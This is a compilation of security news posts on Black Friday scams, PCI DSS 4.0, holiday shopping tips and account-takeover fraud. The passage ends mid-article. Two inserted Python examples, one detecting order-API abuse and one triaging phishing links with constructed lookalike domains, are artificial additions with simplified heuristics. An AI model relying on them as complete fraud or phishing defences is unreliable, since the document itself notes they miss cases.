This week marks Black Friday 2024! As the popularity of this event has skyrocketed in recent years, so have the cyber risks involved in buying and selling products. In the second of two articles, we have gathered some insights from cybersecurity experts who have their say on Black Friday, from the threats faced by consumers and vendors, to the best practices advised to stay safe.

Tim Ward, CEO and Co-Founder of ThinkCyber Security:

“Black Friday, Cyber Monday, and the holiday season are some of the busiest times of the year for online shoppers. Unfortunately, they’re also prime opportunities for cybercriminals to exploit consumers’ hasty shopping habits. With so much focus on finding the best deals, many shoppers are more vulnerable to scams, especially those disguised as unbeatable offers, unexpected refunds, or delivery notifications. 

Psychology plays a significant role in how scammers succeed. Our brains are wired to seek shortcuts and rely on heuristics—mental rules of thumb—to simplify decision-making. During the holiday season, we’re inundated with “amazing deals” and promises of massive savings. This constant exposure to offers can prime us to expect such opportunities everywhere, making us more likely to fall for scams. The mere-exposure effect, a principle of cognitive psychology, explains that the more familiar something feels, the more we trust it—regardless of its legitimacy. Scammers exploit this by crafting offers that appear increasingly credible with repeated exposure. 

Scarcity is another tactic commonly used by both legitimate marketers and cybercriminals during the holidays. Phrases like “Offer ends today,” “Limited stock,” or “Don’t miss out!” are designed to create urgency and push consumers into acting quickly. Scammers leverage this psychological pressure to lure victims into clicking on fraudulent links or sharing personal information. 

So, how can we help shoppers protect themselves from these risks? Education and awareness are key. For example, “re-priming” individuals by exposing them to examples of scams can make them more alert to offers that seem too good to be true. By bringing the possibility of a scam to the forefront of their minds—especially when interacting with emails or online offers—we can help them pause and evaluate the situation more critically. 

Another approach is to guide individuals from relying on intuitive, automatic decisions (System 1 thinking) to more deliberate, cautious decision-making (System 2). For instance, reminding users to verify unfamiliar senders or question urgent calls to action can encourage them to think twice before clicking. Additionally, providing examples of phishing emails that use scarcity tactics can empower individuals to recognise and report suspicious messages. 

Finally, it is crucial to foster an environment where people feel comfortable asking questions or reporting concerns. Real-time nudges—such as alerts for potentially risky emails—can further reinforce secure behaviours. By increasing familiarity with common scams and building awareness, we can empower consumers to shop confidently and safely during the holiday season.”

 

Darren Guccione, CEO and Co-Founder of Keeper Security:

“Black Friday kicks off the holiday shopping season, with retailers competing for online customers by offering enticing discounts. However, behind these tempting deals and flashy banners, cyber threats may be lurking. The wide array of offers by online shopping platforms can also attract cybercriminals looking to hack accounts, steal banking information or trick shoppers into clicking on malicious links. As tempting as a deal may be, it’s crucial to follow some important security measures to ensure a great find doesn’t turn into a digital nightmare.

  • Choose Websites Carefully: With so many deals, it’s easy to click on the first link or the next ad seen on social media or your web browser. However, not all websites are equally secure. Stick to well-known retailers, research reputable brands and ensure that the URL starts with “https” to guarantee a minimum level of security.

 

  • Update Devices: Cyber attacks often exploit vulnerabilities in outdated systems and applications. Make sure your phone, computer and all applications are up-to-date before shopping online. With the latest versions of an operating system and antivirus programs, online security is strengthened.


  • Protect Passwords: Every online store requires its own account, but many people reuse the same passwords across different sites. This habit makes it easy for cybercriminals to infiltrate multiple accounts with one compromised credential. Use unique, complex passwords for each site, and, if possible, use a password manager to simplify management and enhance security.


  • Use Secure Payment Methods: Online shopping requires sharing financial information. Choose payment methods that offer security, like credit cards or secure payment services such as PayPal. To prevent card information from being easily accessible, don’t save it directly on websites or browsers, and never share your financial information via email or messaging – even in the retailer’s chatbot feature.


  • Be Cautious of Deals That Seem Too Good to Be True: Cybercriminals know how to leverage the excitement of the season by offering overly tempting deals. Be wary of unrealistic discounts or offers that pressure you with limited stock. If a website seems suspicious, verify the legitimacy of the offer through other channels before clicking on it.


  • Enable Anti-Phishing Warnings: High shopping seasons are ideal for phishing attempts. To avoid falling into these traps, learn to recognise suspicious emails. Grammar mistakes, poorly reproduced logos or strange links can be red flags. If you receive an offer by email, don’t click immediately – visit the official website through a search engine instead.


  • Avoid Public Wi-Fi: Free Wi-Fi is convenient but not secure. For safer shopping, use your home network or your mobile connection while you’re making purchases. Public networks could expose your sensitive data to hackers who monitor user traffic.”

 

Jasmine Eskenzi, Founder and CEO of The Zensory, says: 

“With Black Friday imminent, many of us may be planning to peruse the latest deals online. But with time pressures (one day only!) and emotive language (unmissable deals!) hidden within marketing materials and ‘across the whole site’, many of us may be put in a position where we feel pressured to make purchases that we may otherwise have not made. But why? And how can we make more conscious purchasing decisions this Black Friday and Cyber Monday?

The Psychology of Stress:

When we’re presented with ‘urgent’ decisions (like an ‘unmissable’ deal written in big red letters), our minds enter a state of stress. This leads us to something called ‘amygdala hijack’. Ultimately, the stress response ‘hijacks’ the area responsible for our fight, flight and freeze response (the amygdala). When our amygdala is activated, this leads to decreased activity to our prefrontal cortex, the part of our brain responsible for attention, memory and focus, located at the front of the brain. So this means, when we’re under high stress, we actually struggle to think clearly, retain information, and our impulse, inhibition and cognitive functions are decreased. These techniques are also often used by hackers to trick victims into giving away sensitive information. 

Tips:

  • Take a breath: It sounds deceptively simple, but one way to get your brain out of ‘fight or flight’ mode is to take a deep breath. Breathe deeply into your belly and become mindful of your surroundings using your five senses (touch, sight, hearing, smell and taste). This is a grounding exercise.
  • Be conscious of scams: In amongst the flashy deals will be cybercriminals looking to exploit unsuspecting victims. Phishing emails may look like they’re from a legitimate source, but they could be fake emails intending to steal credentials or money. Be mindful of the source an email comes from, hover over the email address, and don’t click any links if you’re unsure of their legitimacy (search directly).
  • Ruminate on deals: Alongside taking breaths and practicing grounding exercises, remember that it’s okay to take a step back and revisit an offer later on, especially if it’s not something you were planning to buy (there’s always Cyber Monday, wink wink). By being more conscious about the things you’re buying, you save money and avoid making impulsive buys.”

 

Ben Hutchison, Associate Principal Security Consultant, Black Duck:

“Sadly, the old adage that ‘if it looks too good to be true, it usually is’, still holds true today, even during this time of year. Unfortunately, fantastic-sounding discounts that suddenly appear as emails, text messages, or ads while browsing may not be trustworthy and could compromise consumers’ details, devices, and information.

Consumers can minimise these risks by not replying to or clicking on any such offers, links, or adverts and should attempt to verify any deals by going to a more trustworthy source, such as the company’s website or store home page directly. Attackers may set up spoof versions of these legitimate websites, so users should always ask themselves if this is a domain/website address they recognise and not only rely on suggestions in search results. Users should also follow general cyber security hygiene techniques, such as ensuring their devices and browsers remain up to date. If in doubt about the legitimacy of a promotion, advert, or discount, users may want to consider contacting a sales or support representative via an alternative contact method obtained from a trusted location, or in the case of a local store/chain, users can physically visit the store and confirm if the promotions are legitimate.

Organizations can also take steps to prevent such exploits from succeeding if they are targeted against their employees/environment, through defence-in-depth mechanisms and good security practices. These may include network segmentation, email security and scanning measures, link verification, DNS filtering, leveraging endpoint detection and response solutions, and limiting code/file access and execution where practical.”

The post The Cybersecurity Risks of Black Friday 2024: What are the Experts Saying? Pt.2 appeared first on IT Security Guru.

This week marks Black Friday 2024! As the popularity of this event has skyrocketed in recent years, so have the cyber risks involved in buying and selling products. In the first of two articles, we have gathered some insights from cybersecurity experts who have their say on Black Friday, from the threats faced by consumers and vendors, to the best practices advised to stay safe.

Paul Bischoff, Consumer Privacy Advocate at Comparitech:

“Black Friday is one of the biggest shopping events of the year, offering consumers massive discounts and deals in stores and online. While it’s an excellent opportunity to snag bargains, it’s also a prime time for scammers to exploit eager shoppers. Identifying and avoiding these scams can save you from financial loss and keep your personal information secure.

Last year alone, consumers lost over $8.8 billion to online fraud, according to the Federal Trade Commission. Scam attempts always spike around Black Friday and Cyber Monday. But don’t worry – we’ll show you exactly how to spot these tricks and shop safely.

To protect yourself this Black Friday, you should be watching out for those too-good-to-be-true emails. For example, emails titled “90% OFF EVERYTHING!” from what looks like Amazon or Best Buy. The email appears perfect, down to the logo and formatting. But here’s the catch: clicking that “amazing deal” link could lead you to a fake website that steals your credit card information. In fact, according to Target’s security team, scammers frequently create fake Target websites during Black Friday, often using similar-looking domain names and copied logos to trick shoppers. The FTC reports that retail impersonation scams increase 75% during the holiday shopping season. Shoppers can protect themselves by following these steps:

  • Hover over (don’t click!) email links to preview the real URL
  • Look for spelling mistakes or unusual sender addresses (like amazon-deals@gmail.com)
  • Type the store’s web address directly into your browser instead of clicking email links

Consumers also need to watch out for social media shopping traps. Social media platforms are flooded with fake stores during Black Friday, and many disappear after collecting payments. A few warning signs to take into consideration are brand new accounts with no customer review, prices that seem impossibly low, poor-quality product photos and pressure tactics such as “Only 2 left!” or “Offer expires in 10 minutes!”.

Also, during Black Friday, scammers flood the market with discounted gift card offers that would race any bargain hunter’s heart. But here’s the harsh truth: according to the FBI’s Internet Crime Report, gift card scams cost Americans over $148 million last year alone. A few smart shopping tips for consumers are:

  • Only buy gift cards directly from authorized retailers
  • Never purchase “discounted” gift cards from individuals online
  • Check gift card balances immediately after purchase
  • Keep your receipt until you’re sure the card works
  • Never send gift cards in the mail”

 

Jamie Beckland, CPO at APIContext:

“With Black Friday just around the corner, e-commerce teams should be ready for anything. Load testing is common to ensure infrastructure can handle increased shopper traffic, but many overlook the threat of API misuse, which can open the door to bulk order abuse.

APIs run every part of the e-commerce stack, enabling seamless interactions between front-end systems, payment gateways, inventory management, and third-party integrations. However, poorly secured APIs can be exploited by malicious actors to execute bulk order scams—leveraging automation to exploit pricing errors, bypass purchase limits, or stockpile items meant for individual customers. These exploits are targeted and malicious, and often leverage the same APIs that power customer experiences.

To mitigate these risks, vendors should implement robust security measures such as rate limiting, authentication mechanisms like OAuth, and anomaly detection to identify unusual purchasing patterns. Regular audits and penetration testing can also help identify vulnerabilities before they’re exploited. By addressing API security proactively, businesses not only safeguard revenue but also ensure customer trust during the holiday rush. Black Friday should be a time for deals, not data breaches.”
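The controls named above (rate limiting, authentication, purchase limits and anomaly detection for unusual purchasing patterns) are easiest to reason about as one gate in front of the order endpoint. The following is an added example, not code from APIContext or any retailer: a sliding-window rate limit per API key, a per-customer quantity limit per SKU, a price-tampering check against a server-side catalogue, and a stockpiling heuristic that notices many accounts shipping to one address. The window length, limits, SKUs, API keys and order records are all constructed for the illustration.

```python
"""Order-API abuse gate: rate limiting plus purchase-pattern anomaly checks.
Added example; the limits, catalogue, API keys and orders are constructed."""
from collections import defaultdict, deque
from dataclasses import dataclass, field

WINDOW_SECONDS = 60           # assumed sliding window for the rate limit
MAX_ORDERS_PER_WINDOW = 5     # assumed ceiling per API key inside that window
CATALOG = {"console-xyz": 499.0, "gift-card-50": 50.0}        # constructed list prices
PER_CUSTOMER_LIMIT = {"console-xyz": 1, "gift-card-50": 2}   # constructed per-account caps


@dataclass
class Order:
    ts: float          # request time, epoch seconds
    api_key: str       # authenticated caller (OAuth client or API key)
    account: str       # customer account placing the order
    sku: str
    qty: int
    unit_price: float  # price the client submitted (never trusted as-is)
    ship_to: str


@dataclass
class OrderGuard:
    recent: dict = field(default_factory=lambda: defaultdict(deque))      # api_key -> timestamps
    bought: dict = field(default_factory=lambda: defaultdict(int))        # (account, sku) -> qty
    ship_accounts: dict = field(default_factory=lambda: defaultdict(set)) # address -> accounts

    def check(self, order):
        """Return the reasons to reject or flag the order; an empty list means allow."""
        reasons = []

        # Rate limit: every request counts, including ones rejected further down.
        q = self.recent[order.api_key]
        while q and order.ts - q[0] >= WINDOW_SECONDS:
            q.popleft()
        q.append(order.ts)
        if len(q) > MAX_ORDERS_PER_WINDOW:
            reasons.append("rate_limit")

        # Purchase limit: cumulative quantity per (account, sku) must stay under the cap.
        limit = PER_CUSTOMER_LIMIT.get(order.sku)
        if limit is not None and self.bought[(order.account, order.sku)] + order.qty > limit:
            reasons.append("purchase_limit")

        # Pricing-error abuse: the submitted price is compared with the server-side
        # catalogue; a real checkout should recompute the price rather than trust the client.
        if order.unit_price < 0.5 * CATALOG[order.sku]:
            reasons.append("price_anomaly")

        # Stockpiling pattern: a fourth distinct account shipping to the same address.
        accounts = self.ship_accounts[order.ship_to]
        if order.account not in accounts and len(accounts) >= 3:
            reasons.append("shared_shipping_address")

        if not reasons:  # only allowed orders consume quota and register the address
            self.bought[(order.account, order.sku)] += order.qty
            accounts.add(order.account)
        return reasons


def run_sample():
    """Feed a constructed burst of orders through the gate and return each verdict."""
    guard = OrderGuard()
    t0 = 1_700_000_000.0
    sample = [
        Order(t0,     "key-A", "acct-1", "console-xyz", 1, 499.0, "5 Elm Rd"),
        Order(t0 + 1, "key-A", "acct-1", "console-xyz", 1, 499.0, "5 Elm Rd"),  # second console
        Order(t0 + 2, "key-A", "acct-2", "console-xyz", 1, 4.99,  "7 Oak Rd"),  # tampered price
    ]
    # key-B: six accounts, one shipping address, all inside a single window
    for i in range(6):
        sample.append(Order(t0 + 10 + i, "key-B", f"acct-{10 + i}", "gift-card-50", 2, 50.0, "1 Main St"))
    # key-A again after the window has elapsed: its rate state has drained
    sample.append(Order(t0 + 120, "key-A", "acct-3", "console-xyz", 1, 499.0, "9 Pine Rd"))
    return [guard.check(o) for o in sample]


if __name__ == "__main__":
    for verdict in run_sample():
        print(verdict or "allow")
```

The gate is deliberately stateful per API key and per account: a burst of orders from many freshly created accounts through one key is exactly the shape of bulk-order abuse that load testing never exercises, so this logic belongs in the pre-season test plan alongside the capacity tests.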

 

Jamie Akhtar, Co-founder and CEO of CyberSmart:

“Black Friday offers bargains for savvy shoppers, but it also poses security risks for consumers and businesses alike. To illustrate what we mean, the UK alone saw losses exceeding £11.5 million due to online shopping scams between November 2023 and January 2024.

However, forewarned is forearmed, so here are some of cybercriminals’ top tactics for Black Friday scams.

Phishing Scams

While phishing scams are a year-round problem, the threat becomes particularly pronounced between Black Friday and Christmas. According to Bitdefender, 70% of Black Friday-themed spam emails in 2023 were identified as scams, revealing the scale of the problem. 

Worse still, cybercriminals are increasingly using AI tools to create and distribute these scams, making them harder to identify.

Fake Websites

Cybercriminals create imitation websites that closely resemble legitimate retailers. These sites often advertise unbelievable deals through search engines to lure shoppers into entering personal and payment information, leading to identity theft or financial loss.

Gift card frauds

Fraudulent schemes involving gift cards are another common tactic. Essentially, scammers sell fake or drained gift cards for large online retailers to victims. 

Fake Order Confirmations

Scammers send emails or messages that mimic order confirmations for purchases that were never made. These communications often contain links to phishing sites or requests for personal or financial information.

Social Media Scams

We all remember the huge uptick in Facebook Messenger for Business scams during 2023, and cybercriminals use the same tactics to launch Black Friday scams. Scammers use social media to promote fake bargains or impersonate brands. Unfortunately, this is usually pretty successful; fraud losses climb by around 20% in the festive shopping season.

Delivery Scams

Scammers may send fake delivery notifications via email or text, prompting victims to provide personal information under the guise of confirming a delivery.

Transaction Failure Scams

Victims receive spam emails claiming that a recent transaction has failed, tricking them into providing sensitive information to resolve the issue.

Account Verification Scams

These scams involve messages asking users to verify their accounts due to suspicious activity, leading them to phishing sites designed to collect login credentials.

 

How to protect yourself/your business:

For consumers

  • Always verify the legitimacy of websites before making purchases
  • Be cautious of unsolicited emails and messages
  • Use secure payment methods like credit cards instead of wire transfers
  • Look for signs of counterfeit goods and check seller reviews

 

For businesses

  • Provide staff with training on the dangers of Black Friday shopping
  • Implement MFA across all company devices and applications (including personal devices being used for work)
  • Where possible, dissuade staff from using company devices for shopping
  • Put clear usage and security policies in place for employees
  • Mandate VPN use for all staff, particularly those working remotely.”

 

Andrew Bolster, Senior Manager, Research and Development, Black Duck:

“One thing consumers should be more vigilant for is ‘astroturfing’ product reviews and testimonials. In past years, we typically trusted the experience and advice of our neighbours and peers, and recommendations were worth their weight in gold, but in the world of online retailing in the context of modern Large Language Models, shoppers need to be aware of retailers or suppliers using AI generated synthetic reviews of their own products to drive sales. Shoppers should always take online reviews cautiously and with a grain of salt, and where possible, seek and share recommendations among friends and family.”

Thomas Richards, Principal Security Consultant, Black Duck:

“Consumers should be extra diligent this shopping season as we approach Black Friday and the holiday rush. With the number of breaches this year, a lot of consumer data is in the hands of malicious actors who can use it to craft very convincing messages via email and text. Consumers should be cautious when clicking links in emails that sound too good to be true. Yes, some holiday deals are very good, but that does not mean they all are. Always check the sending email address to be sure it matches the website of the company it is purporting to be from. If you receive an email from an online store that you don’t recognise offering amazing deals on hard-to-get items, it’s probably a scam. The best deals will mostly come from established retailers or the company themselves.”

The post The Cybersecurity Risks of Black Friday 2024: What are the Experts Saying? appeared first on IT Security Guru.

Selling miniature replicas to unsuspecting shoppers:

Online marketplaces sell tiny pink cowboy hats. They also sell miniature pencil sharpeners, palm-size kitchen utensils, scaled-down books and camping chairs so small they evoke the Stonehenge scene in “This Is Spinal Tap.” Many of the minuscule objects aren’t clearly advertised.

[…]

But there is no doubt some online sellers deliberately trick customers into buying smaller and often cheaper-to-produce items, Witcher said. Common tactics include displaying products against a white background rather than in room sets or on models, or photographing items with a perspective that makes them appear bigger than they really are. Dimensions can be hidden deep in the product description, or not included at all.

In those instances, the duped consumer “may say, well, it’s only $1, $2, maybe $3—what’s the harm?” Witcher said. When the item arrives the shopper may be confused, amused or frustrated, but unlikely to complain or demand a refund.

“When you aggregate that to these companies who are selling hundreds of thousands, maybe millions of these items over time, that adds up to a nice chunk of change,” Witcher said. “It’s finding a loophole in how society works and making money off of it.”

Defrauding a lot of people out of a small amount each can be a very successful way of making money.

By Tyler Reguly, senior manager, security R&D at cybersecurity software and services provider Fortra

The pandemic ushered in an unprecedented wave of online purchasing, as people around the world became far more comfortable with virtual shopping. In fact, the U.S. Census Bureau’s latest Annual Retail Trade Survey reports e-commerce expenditures rose from $571.2 billion in 2019 to $815.4 billion in 2020, a 43% increase.

Cybercriminals everywhere matched the uptick with clever new schemes to filch payment card data and defraud victims of billions of dollars. The Nilson Report estimated $28.6 billion in payment card-related losses occurred in 2020 (over one-third of them in the U.S.). They also predict this number will reach $408 billion in losses by 2030.

Time for change

With the boom in digital commerce paired with the increased popularity of contactless payment and cloud-stored accountholder data, the Payment Card Industry (PCI) Security Standards Council decided to re-evaluate the existing standard. First launched in 2004 and updated most recently in 2018, the PCI Data Security Standard (PCI DSS) is continually updated to reflect the evolving challenges of the cyberthreat landscape.

The current version, PCI DSS v3.2.1, is clearly failing to protect cardholder account details effectively in today’s environment. The Council gathered input from 200+ organizations and announced the updated requirements in March 2022, which will become mandatory on March 31, 2024. Organizations also have until 2025 to implement a set of future-dated changes. The full timeline can be found on the PCI Security Council website.

The 12 controls

PCI DSS 4.0 spans 12 controls, several of which have received updates in the latest version. According to the PCI Council, the enhanced requirements promote security as a continuous process while adding flexibility for different methodologies.

  1. Install and maintain network security controls
  2. Apply secure configurations to all system components
  3. Protect stored account data
  4. Protect cardholder data with strong cryptography during transmission over open, public networks
  5. Protect all systems and networks from malicious software
  6. Develop and maintain secure systems and software
  7. Restrict access to cardholder data by business need-to-know
  8. Identify users and authenticate access to system components
  9. Restrict physical access to cardholder data
  10. Log and monitor all access to system components and cardholder data
  11. Test security of systems and networks regularly
  12. Support information security within organizational policies and programs

Changes in PCI DSS 4.0

In looking at the new standard more closely, there are several requirements with notable changes. Below is a high-level overview of the differences between PCI v3.2.1 and PCI v4.0:

Requirement 2: Broader scope defining the need for security configuration management (SCM) on more types of assets.

Requirement 3: “Account Data” instead of “Cardholder Data” indicates a potential increase of scope for PCI assets.

Requirement 4: Less specificity on the type of encryption used means your organization is freer to follow industry best practices. An important takeaway is to internally define what those technical standards are and be able to justify why they are now “Strong Cryptography” so that you can still pass your PCI audit (essentially, just document what standards you are following and why).

Requirement 5: It is no longer sufficient to just have standard antivirus software. This requirement now specifically calls for anti-malware to be in place, necessitating a strong antivirus solution with malware protection or EDR/MDR/XDR solution.

Requirements 7–9: These requirements are primarily the same as before, but the big takeaway is that instead of just enforcing access controls to systems, it’s now requesting this to be done more granularly to specific components such as software, databases, etc.

Your five-step PCI DSS 4.0 transition checklist 

As you get up to speed on how the standard itself has evolved, you’ll begin to understand the potential impact to your own processes and operations. This isn’t a one-and-done type of effort. It will require a phased approach over time. Successful organizations will view the new requirements as an opportunity to strengthen the security mindset across many aspects of their business.

To help you get started, you’ll want to build the following components into your initiative:

  1. Plan a phased implementation according to the PCI timeline
  2. Review potential changes to scope
  3. Conduct a people and process evaluation
  4. Strengthen security configuration management (SCM) processes
  5. Onboard a tool that automates continuous compliance

Go in-depth on how to approach each of these items in this executive guide, the Five-Step PCI DSS v4.0 Transition Checklist. This essential resource helps you understand the requirements of PCI DSS 4.0 and how to ensure your organization is addressing the changes needed to avoid audit fines and data breaches.

Above all, securing payment card information helps protect your customers’ sensitive information and your company’s reputation by preventing costly business disruption in a fast-changing cyberattack environment.

Tyler Reguly is senior manager, security R&D at cybersecurity software and services provider Fortra, responsible for overseeing TACTIC, a team of security researchers that provide the security expertise that powers the company’s Tripwire product line.

In addition to security research, Tyler has worked closely with Fanshawe College, from which he graduated with a diploma in Computer Systems Technology, developing five courses including subjects like Advanced Hacker Techniques & Tactics, Hacking and Exploits, Malware Research, Evolving Technologies and Threats, and Python Programming.

Tyler has contributed to various standards over the years including CVSSv3 and has provided technical editing to a number of published books. In addition, he is a co-founder of the IoT Hack Lab that has been offered at SecTor (Security Education Conference Toronto) since 2015.

Follow Tyler Reguly on Twitter.

The post The Five-Step PCI DSS 4.0 Transition Checklist appeared first on Cybersecurity Insiders.

By Gal Ringel, Co-Founder & CEO of Mine Privacy Ops

If you’re busy planning your holiday shopping this month, you’re not alone. Q4 is always the busiest time of year for shoppers and retailers, chock-full of shopping celebrations like Singles’ Day, Black Friday, and Cyber Monday, among others. In 2021, online holiday sales reached $211.41 billion, and this year, shoppers are predicted to spend $209.7 billion, a 2.5% YoY growth for the holiday season.

Is Online Shopping Safe?

As Covid pushed the pendulum ever closer to ecommerce supremacy, more people are shopping online in 2022 than ever before, with the usual holiday spike already upon us. That means more people unaware of the risks online shopping presents (other than overspending).

The holiday shopping season brings with it many e-commerce scams and setups aimed at both consumers and companies, including data breaches, counterfeit scammers selling fake goods, and fake phishing pages designed to steal people’s personal and financial details for monetary exploitation and identity theft.

Businesses have been quick to ramp up websites to match consumer shopping trends, but cybersecurity measures are lagging behind. That makes this holiday shopping season particularly precarious for consumers, who should keep these tips in mind to safeguard their data as they browse gifts for their loved ones.

Naughty or Nice: Online Shopping Safety Tips

Despite the above warning, there’s no reason to limit your online experiences, and we encourage you to continue your holiday shopping as planned, although you should pay extra attention to specific elements.

  1. Buy from websites you know and trust: Scammers like to set up fake websites that resemble familiar brands. These websites are likely to appear after the first few pages of an online search, but not always. By visiting a page you know and have shopped at before, you are less likely to buy fake goods or give your payment details to the wrong people.
  2. Type in the URL: If you get a tempting offer via email or text, search for the brand’s website and make sure the offer is actually there. There’s no reason to click unfamiliar links that could scam or phish you. Pay close attention to URL spelling errors in any links sent to you, and remember that serious brands are far less likely to operate websites with an ending other than .com.
  3. Seek the lock: The padlock icon you see on every major website isn’t just a decoration. It represents SSL (Secure Sockets Layer) encryption protecting shopping websites. If you don’t see this icon and the URL doesn’t begin with HTTPS, you should think twice before giving away your payment details. HTTPS is the secure and updated version of HTTP, so make sure a site starts with that too before you buy.
  4. Use strong passwords: It’s 2022, and 50% of users still use passwords like “1234” and “password.” 51% use the same password for multiple accounts, risking a significant data loss if one is revealed. Sure, remembering all those crazy combinations may be challenging, but it also makes it challenging for hackers to access your bank account or steal your identity. Whenever possible, choose two-step authentication and pay using an online payment system like PayPal, which encrypts your payment information.
  5. Read reviews: Before making a purchase, read a few reviews and see if the site seems legit. Can scammers fake reviews? Sure, but it’s more of an effort. Reviews are a part of the overall trustworthiness of the shopping experience, so consider them another step in your evidence-gathering process.
  6. Don’t be gullible: Brilliant deals are always exciting, but double-check everything on the website. If something sounds unreasonably generous, don’t be tempted to save money if it might cost you a lot more, especially if one of the above security concerns is present on the site.
  7. Only provide necessary details: If a website asks for personal information that doesn’t feel relevant, run away. This may be scammers attempting to commit identity theft disguised as a legitimate shopping experience. Generally speaking, you should apply this approach to any website you visit and refrain from sharing information without getting reasonable value in return.
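Tips 2 and 3 above, and the earlier advice from Paul Bischoff (hover over email links to preview the real URL, and distrust sender addresses like amazon-deals@gmail.com), amount to a small set of mechanical checks that a mail gateway or a browser extension can apply before a person ever has to judge the offer. The code below is an added example written for this page; it is not Mine’s, Comparitech’s or any quoted expert’s code. It assumes a constructed table of brands and the domains they really use, a constructed list of free-mail providers, and two constructed messages. The `registrable()` helper is a two-label approximation that a production tool would replace with a Public Suffix List lookup. One caveat the tips leave implicit: an https link proves only that the connection is encrypted, not that the merchant behind it is genuine, which is why the checks below treat scheme, sender and lookalike host separately.

```python
"""Triage the links and sender of a shopping-offer message.
Added example; brand table, free-mail list and sample messages are constructed."""
import re
from urllib.parse import urlsplit

# Constructed: brands and the registrable domains they actually use.
BRAND_DOMAINS = {
    "amazon": {"amazon.com", "amazon.co.uk"},
    "target": {"target.com"},
}
# Constructed: consumer mail providers a retailer would never send offers from.
FREE_MAIL = {"gmail.com", "outlook.com", "yahoo.com"}

# Display text that looks like a host or URL, e.g. "www.amazon.com/deals".
_HOSTLIKE = re.compile(r"(?:https?://)?([A-Za-z0-9.-]+\.[A-Za-z]{2,})(?:[/?#].*)?$")


def registrable(host):
    """Last two labels of a host; an approximation of the registrable domain (no PSL)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else parts[0]


def sender_findings(sender, claimed_brand):
    """Flag a sender address that does not belong to the brand it claims to be."""
    findings = []
    domain = registrable(sender.rsplit("@", 1)[-1])
    if domain in FREE_MAIL:
        findings.append("sender_uses_free_mail_provider")
    if domain not in BRAND_DOMAINS.get(claimed_brand, set()):
        findings.append("sender_domain_not_brand")
    return findings


def link_findings(display_text, href):
    """The 'hover before you click' checks for one link: scheme, shown vs real host, lookalikes."""
    findings = []
    target = urlsplit(href)
    if target.scheme != "https":
        findings.append("not_https")
    real_host = registrable(target.hostname or "")
    shown = _HOSTLIKE.match(display_text.strip())
    if shown and registrable(shown.group(1)) != real_host:
        findings.append("display_host_mismatch")
    # A brand name embedded in a host that is not one of the brand's own domains
    # (digit-for-letter swaps such as amaz0n are folded before comparing).
    folded = real_host.replace("0", "o").replace("1", "l")
    for brand, domains in BRAND_DOMAINS.items():
        if brand in folded and real_host not in domains:
            findings.append(f"lookalike_of_{brand}")
    return findings


def triage_message(msg):
    """msg: {'sender', 'claimed_brand', 'links': [(display_text, href), ...]} -> sorted findings."""
    found = set(sender_findings(msg["sender"], msg["claimed_brand"]))
    for text, href in msg["links"]:
        found.update(link_findings(text, href))
    return sorted(found)


SAMPLE_MESSAGES = [  # constructed for the example
    {"sender": "amazon-deals@gmail.com", "claimed_brand": "amazon",
     "links": [("www.amazon.com/deals", "http://amaz0n-deals.example/claim")]},
    {"sender": "orders@target.com", "claimed_brand": "target",
     "links": [("target.com/orders", "https://www.target.com/orders")]},
]


def run_sample():
    return [triage_message(m) for m in SAMPLE_MESSAGES]


if __name__ == "__main__":
    for msg, verdict in zip(SAMPLE_MESSAGES, run_sample()):
        print(msg["sender"], "->", verdict or "no findings")
```

Any single finding is enough to justify the advice in tip 2: close the message and type the retailer’s address into the browser yourself. The absence of findings is not a clean bill of health, since a registered lookalike domain with a valid certificate passes the scheme check, which is why the brand table, not the padlock, carries the real weight here.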

Done Shopping? Don’t Forget to Clean Your Footprint

Our eighth and final tip is actually for after the shopping ends.

If you feel like you’ve given too many online services your personal and payment data (which is probably the case for most of us, with the average person’s digital footprint at roughly 350 companies), there’s a way to regain control. Mine allows you to own your personal information without limiting your online experiences, all for free.

The quick and free process will reveal every service that has collected your data in the past, after which you can take back your data from any service that you don’t use or don’t feel comfortable with having your data on record.

So once you’re done buying gifts for loved ones, give yourself the greatest gift of all and minimize your digital footprint and online exposure.

The post Safe Sales: 8 Tips for Keeping Your Data Safe & Secure This Holiday Shopping Season appeared first on Cybersecurity Insiders.

By Doriel Abrahams, Head of U.S. Analytics, Forter

Account takeover (ATO) fraud is a rapidly growing and costly challenge for businesses. In fact, it’s expected to surpass malware as the top cybersecurity concern in the not-too-distant future.

The COVID-19 pandemic certainly added fuel to the fire, as droves of consumers suddenly came online to create new accounts with stores and apps they had never visited before. Some of those customer accounts have since gone dormant, while many others remain inadequately protected due to weak passwords or the absence of safeguards like multi-factor authentication (MFA).

In working with many global brands over the years, I’ve been able to follow the ever-evolving trends in both customer behavior and fraud attack methods. What’s interesting to see is how ATO is playing out across the different industries and geographies – and more importantly, how businesses are responding.

Evolution of ATO

A decade ago, fraud prevention was largely focused on chargebacks and online checkout. But as merchants got better at protecting checkout, fraudsters got more creative with ways to attack. They’re no longer targeting just checkout, but the entire digital customer journey, of which ATO is a large part.

Fraudsters like going after online accounts for the same reasons customers open them: they make it easy to do business with merchants, whether it’s to purchase a product, cash in loyalty points or take advantage of a promotion. Consumers enjoy convenience and discounts. For fraudsters, it’s like walking into a candy store as a legitimate-looking customer with a sweet array of options to do damage.

The bad news is only getting worse for retailers, as fraudsters grow bolder and go after more valuable items than ever before. Across Forter’s own network, we’ve seen the average order value of items in ATO attacks increase by 51% in the past year.

Shifting Trends = New Opportunities

Always looking to exploit emerging trends, fraudsters are adept at tracking changes in the market. Attacks are up across many verticals, including digital goods, travel and cryptocurrency. And while all industries are ripe targets for ATO fraud, some are more attractive than others.

For example, the beauty industry has seen ATO attacks increase by 94%. Beauty and cosmetics has traditionally been a high-touch, in-person experience where customers often want to test the products before purchasing them and consult with a store associate on colors, scents and application techniques. This model isn’t going away, but more transactions have shifted from in store to online over the last few years.

One explanation for the continued growth in beauty e-commerce is the exclusivity and special offers associated with online accounts. Beauty brands have long been masters at inspiring loyalty and enthusiasm for their products. Their carefully curated programs are successful at winning and keeping customers, but also open the door to new opportunities for fraudsters.

Beauty isn’t the only industry that fraudsters have followed with a keen eye. Online apparel also continues to grow with some brands even integrating app-based purchase and interaction capabilities into their physical stores. It’s no surprise that ATO fraud against apparel companies has increased by 28% compared to 2021.

Proven Prevention Strategies

As criminals become more sophisticated, their fraud tactics are also evolving. So what can you do to protect your company from ATO without sacrificing the customer experience?

Every business has its own unique set of challenges, but here are three strategies that are widely effective at stopping ATO attacks in their tracks:

